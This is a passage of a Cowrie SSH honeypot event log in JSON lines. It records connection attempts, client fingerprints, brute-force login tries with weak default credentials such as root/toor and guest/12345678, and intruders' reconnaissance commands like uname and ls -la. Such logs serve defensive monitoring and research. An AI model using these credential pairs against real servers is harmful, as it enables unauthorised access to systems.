{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":36742,"dst_ip":"1.2.3.4","dst_port":22,"session":"1966fd3b8185","protocol":"ssh","message":"New connection: 212.227.125.160:36742 (1.2.3.4:22) [session: 1966fd3b8185]","sensor":"my-vps","timestamp":"2025-08-31T03:25:27.200797Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T03:25:27.735033Z","src_ip":"212.227.125.160","session":"1966fd3b8185"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T03:25:27.735786Z","src_ip":"212.227.125.160","session":"1966fd3b8185"}
{"eventid":"cowrie.login.failed","username":"guest","password":"12345678","message":"login attempt [guest/12345678] failed","sensor":"my-vps","timestamp":"2025-08-31T03:25:30.047042Z","src_ip":"212.227.125.160","session":"1966fd3b8185"}
{"eventid":"cowrie.session.closed","duration":"60.2","message":"Connection lost after 60.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:25:31.142596Z","src_ip":"212.227.235.229","session":"1d49672b56f4"}
{"eventid":"cowrie.session.closed","duration":"4.4","message":"Connection lost after 4.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:25:31.557577Z","src_ip":"212.227.125.160","session":"1966fd3b8185"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T03:25:35.966899Z","src_ip":"212.227.125.160","session":"004559879d89"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T03:25:36.058753Z","src_ip":"212.227.125.160","session":"004559879d89"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":37902,"dst_ip":"1.2.3.4","dst_port":22,"session":"7050d7e326c4","protocol":"ssh","message":"New connection: 212.227.235.229:37902 (1.2.3.4:22) [session: 7050d7e326c4]","sensor":"my-vps","timestamp":"2025-08-31T03:25:36.448093Z"}
{"eventid":"cowrie.session.connect","src_ip":"41.226.27.251","src_port":34354,"dst_ip":"1.2.3.4","dst_port":22,"session":"cea328b34211","protocol":"ssh","message":"New connection: 41.226.27.251:34354 (1.2.3.4:22) [session: cea328b34211]","sensor":"my-vps","timestamp":"2025-08-31T03:25:39.192169Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T03:25:39.192940Z","src_ip":"41.226.27.251","session":"cea328b34211"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T03:25:39.236481Z","src_ip":"41.226.27.251","session":"cea328b34211"}
{"eventid":"cowrie.login.success","username":"root","password":"toor","message":"login attempt [root/toor] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:25:39.365638Z","src_ip":"41.226.27.251","session":"cea328b34211"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T03:25:39.924495Z","src_ip":"41.226.27.251","session":"cea328b34211"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-31T03:25:39.925219Z","src_ip":"41.226.27.251","session":"cea328b34211"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:25:39.969214Z","src_ip":"41.226.27.251","session":"cea328b34211"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:25:39.970299Z","src_ip":"41.226.27.251","session":"cea328b34211"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T03:25:44.153186Z","src_ip":"79.127.48.196","session":"ec4568e6c6bf"}
{"eventid":"cowrie.command.input","input":"ls -la /","message":"CMD: ls -la /","sensor":"my-vps","timestamp":"2025-08-31T03:25:44.153953Z","src_ip":"79.127.48.196","session":"ec4568e6c6bf"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":59478,"dst_ip":"1.2.3.4","dst_port":22,"session":"3f5ab6cc8f44","protocol":"ssh","message":"New connection: 212.227.125.160:59478 (1.2.3.4:22) [session: 3f5ab6cc8f44]","sensor":"my-vps","timestamp":"2025-08-31T03:25:47.805780Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:25:47.806798Z","src_ip":"212.227.125.160","session":"3f5ab6cc8f44"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T03:25:48.052558Z","src_ip":"212.227.125.160","session":"3f5ab6cc8f44"}
{"eventid":"cowrie.login.failed","username":"postgres","password":"dell@2021","message":"login attempt [postgres/dell@2021] failed","sensor":"my-vps","timestamp":"2025-08-31T03:25:49.071740Z","src_ip":"212.227.125.160","session":"3f5ab6cc8f44"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/352110e27ca54240da15349cfe3b896942c0edeb85990b5868f21c885813869f","size":1347,"shasum":"352110e27ca54240da15349cfe3b896942c0edeb85990b5868f21c885813869f","duplicate":true,"duration":"6.1","message":"Closing TTY Log: var/lib/cowrie/tty/352110e27ca54240da15349cfe3b896942c0edeb85990b5868f21c885813869f after 6.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:25:50.235825Z","src_ip":"79.127.48.196","session":"ec4568e6c6bf"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:25:50.313114Z","src_ip":"212.227.125.160","session":"3f5ab6cc8f44"}
{"eventid":"cowrie.session.connect","src_ip":"41.226.27.251","src_port":43820,"dst_ip":"1.2.3.4","dst_port":22,"session":"d5c315b2cd8e","protocol":"ssh","message":"New connection: 41.226.27.251:43820 (1.2.3.4:22) [session: d5c315b2cd8e]","sensor":"my-vps","timestamp":"2025-08-31T03:25:59.279258Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T03:25:59.280151Z","src_ip":"41.226.27.251","session":"d5c315b2cd8e"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T03:25:59.325162Z","src_ip":"41.226.27.251","session":"d5c315b2cd8e"}
{"eventid":"cowrie.login.success","username":"root","password":"qwerty","message":"login attempt [root/qwerty] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:25:59.461004Z","src_ip":"41.226.27.251","session":"d5c315b2cd8e"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T03:25:59.569581Z","src_ip":"41.226.27.251","session":"d5c315b2cd8e"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-31T03:25:59.570249Z","src_ip":"41.226.27.251","session":"d5c315b2cd8e"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:25:59.615985Z","src_ip":"41.226.27.251","session":"d5c315b2cd8e"}
{"eventid":"cowrie.session.closed","duration":"0.3","message":"Connection lost after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:25:59.616954Z","src_ip":"41.226.27.251","session":"d5c315b2cd8e"}
{"eventid":"cowrie.session.closed","duration":"95.1","message":"Connection lost after 95.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:26:02.144736Z","src_ip":"79.127.48.196","session":"ec4568e6c6bf"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":54618,"dst_ip":"1.2.3.4","dst_port":22,"session":"48d654660e57","protocol":"ssh","message":"New connection: 212.227.235.229:54618 (1.2.3.4:22) [session: 48d654660e57]","sensor":"my-vps","timestamp":"2025-08-31T03:26:05.786928Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T03:26:06.516790Z","src_ip":"212.227.235.229","session":"48d654660e57"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T03:26:06.517509Z","src_ip":"212.227.235.229","session":"48d654660e57"}
{"eventid":"cowrie.session.closed","duration":"30.4","message":"Connection lost after 30.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:26:06.869525Z","src_ip":"212.227.235.229","session":"7050d7e326c4"}
{"eventid":"cowrie.login.failed","username":"guest","password":"123456789","message":"login attempt [guest/123456789] failed","sensor":"my-vps","timestamp":"2025-08-31T03:26:12.555765Z","src_ip":"212.227.235.229","session":"48d654660e57"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","size":473,"shasum":"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","duplicate":true,"duration":"180.0","message":"Closing TTY Log: var/lib/cowrie/tty/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 after 180.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:26:12.992944Z","src_ip":"212.227.125.160","session":"7d81fcdae368"}
{"eventid":"cowrie.session.closed","duration":180.10489463806152,"message":"Connection lost after 180 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:26:12.996974Z","src_ip":"212.227.125.160","session":"7d81fcdae368"}
{"eventid":"cowrie.session.closed","duration":"8.6","message":"Connection lost after 8.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:26:14.349588Z","src_ip":"212.227.235.229","session":"48d654660e57"}
{"eventid":"cowrie.session.connect","src_ip":"41.226.27.251","src_port":37418,"dst_ip":"1.2.3.4","dst_port":22,"session":"d51096e23ddf","protocol":"ssh","message":"New connection: 41.226.27.251:37418 (1.2.3.4:22) [session: d51096e23ddf]","sensor":"my-vps","timestamp":"2025-08-31T03:26:19.407252Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T03:26:19.408138Z","src_ip":"41.226.27.251","session":"d51096e23ddf"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T03:26:19.450537Z","src_ip":"41.226.27.251","session":"d51096e23ddf"}
{"eventid":"cowrie.login.failed","username":"oracle","password":"123qwe","message":"login attempt [oracle/123qwe] failed","sensor":"my-vps","timestamp":"2025-08-31T03:26:19.579765Z","src_ip":"41.226.27.251","session":"d51096e23ddf"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:26:20.822866Z","src_ip":"41.226.27.251","session":"d51096e23ddf"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":44630,"dst_ip":"1.2.3.4","dst_port":22,"session":"47518e123451","protocol":"ssh","message":"New connection: 212.227.125.160:44630 (1.2.3.4:22) [session: 47518e123451]","sensor":"my-vps","timestamp":"2025-08-31T03:26:27.418355Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T03:26:27.806990Z","src_ip":"212.227.125.160","session":"47518e123451"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T03:26:27.807763Z","src_ip":"212.227.125.160","session":"47518e123451"}
{"eventid":"cowrie.login.failed","username":"guest","password":"123456789","message":"login attempt [guest/123456789] failed","sensor":"my-vps","timestamp":"2025-08-31T03:26:29.321367Z","src_ip":"212.227.125.160","session":"47518e123451"}
{"eventid":"cowrie.session.closed","duration":"3.5","message":"Connection lost after 3.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:26:30.941194Z","src_ip":"212.227.125.160","session":"47518e123451"}
{"eventid":"cowrie.login.failed","username":"oracle","password":"qwe123","message":"login attempt [oracle/qwe123] failed","sensor":"my-vps","timestamp":"2025-08-31T03:26:35.824792Z","src_ip":"212.227.125.160","session":"004559879d89"}
{"eventid":"cowrie.session.connect","src_ip":"41.226.27.251","src_port":44160,"dst_ip":"1.2.3.4","dst_port":22,"session":"c5a31258e5b5","protocol":"ssh","message":"New connection: 41.226.27.251:44160 (1.2.3.4:22) [session: c5a31258e5b5]","sensor":"my-vps","timestamp":"2025-08-31T03:26:39.376528Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T03:26:39.448937Z","src_ip":"41.226.27.251","session":"c5a31258e5b5"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gc